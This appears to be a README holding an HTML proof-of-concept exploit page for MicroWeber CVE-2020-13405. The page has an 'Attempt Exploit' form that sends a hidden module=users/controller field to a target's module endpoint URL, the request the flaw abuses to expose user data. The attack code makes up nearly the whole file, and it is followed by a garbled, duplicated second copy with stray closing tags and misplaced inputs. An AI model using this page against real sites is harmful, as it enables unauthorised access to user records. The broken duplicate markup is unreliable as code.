README.md
Rendering markdown...
<!DOCTYPE html>
<html>
<head>
<title>MicroWeber CVE-2020-13405 PoC</title>
<meta name="referrer" content="origin">
<script>
function updateForm() {
var modulesUrl = document.getElementById("module_url").value.trim();
if (isValidURL(modulesUrl)) {
document.getElementById("exploit_form").action = modulesUrl;
return true;
} else {
alert("Kindly provide a valid URL in the MicroWeber Module Endpoint URL field before proceeding with the operation.");
return false;
}
}
function isValidURL(url) {
const urlPattern = /^https?:\/\/.+/i; // Regular expression pattern for http:// or https://
return urlPattern.test(url);
}
</script>
</head>
<body>
<h1 style="color:red;">MicroWeber CVE-2020-13405 PoC</h1>
<h2 style="color:red;">Base Score: 7.5 HIGH</h2>
<form action="/placeholder" method="post" id="exploit_form" name="exploit_form">
<label for="module_url">MicroWeber Module Endpoint URL</label>
<input type="text" id="module_url" name="module_url" placeholder="http://localhost/module">
<input type="submit" value="Attempt Exploit" onclick="return updateForm()">
<input type="hidden" id="module" name="module" value="users/controller">
</form>
</body>
</html>
</script>
</head>
<h1 style="color:red;">MicroWeber CVE-2020-13405 PoC</h1>
<h1 style="color:red;">Base Score: 7.5 HIGH</h1>
<h3 style="color:red;"></h3>
</br>
<label for="fname">MicroWeber Module Endpoint URL</label>
<input type="text" id="module_url" name="module_url" placeholder="http://localhost/module">
<form action="/placeholder" method="post" id="exploit_form" name="exploit_form">
<input type="submit" value="Attempt Exploit" onclick="return updateForm()">
<input type="hidden" id="module" name="module" value="users/controller">
</form>
</html>